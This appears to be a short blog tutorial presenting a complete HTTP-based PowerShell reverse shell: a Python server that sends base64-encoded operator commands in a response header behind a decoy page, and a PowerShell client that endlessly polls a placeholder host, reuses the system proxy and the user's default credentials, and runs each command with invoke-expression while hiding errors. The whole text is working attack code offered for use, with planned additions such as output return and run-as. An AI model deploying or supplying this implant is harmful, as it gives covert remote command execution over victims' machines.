creating simple http-based powershell reverse shell

Truth is, its not that difficult. All you need are 2 components: client and server.

The server is relatively simple bit of python code that adds special header which then gets executed on the client side (base64 encoded)

from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
import base64

PORT_NUMBER = 8080

class myHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        CMD = base64.b64encode(raw_input("CMD: >> "))
        self.send_header('CMD',CMD)
        self.end_headers()
        self.wfile.write("<html><body>nothing to see here</body></html>")
        return
try:
    server = HTTPServer(('', PORT_NUMBER), myHandler)
    server.serve_forever()

except KeyboardInterrupt:
    print '^C received, shutting down the web server'
    server.socket.close()

The client, on the other hand just sit there to picks up the commands and execute them (it does not give any result back so its blind!). If it can’t connect it will retry in loop forever.

while (1 -eq 1){
try{
$url = "http://x.x.x.x:8080/p"
# handle proxies and used default creds if needed
$req = [System.Net.HttpWebRequest]::Create($url);
$p=[System.Net.WebRequest]::GetSystemWebProxy();
$p.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
# add our header
$req.Headers.add('CMD','INITIAL')
$res = $req.GetResponse();
$x = $res.GetResponseHeader("CMD");
# decode base64
$d = [System.Convert]::FromBase64String($x);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);
# exec whatever we gave it (can be powershell or just shell commands)
invoke-expression $Ds;
$res.Close();
}catch{}
}

I intended to improve it and add some features like:
* SSL
* Output transmission
* Ability to ‘run-as’
* error handling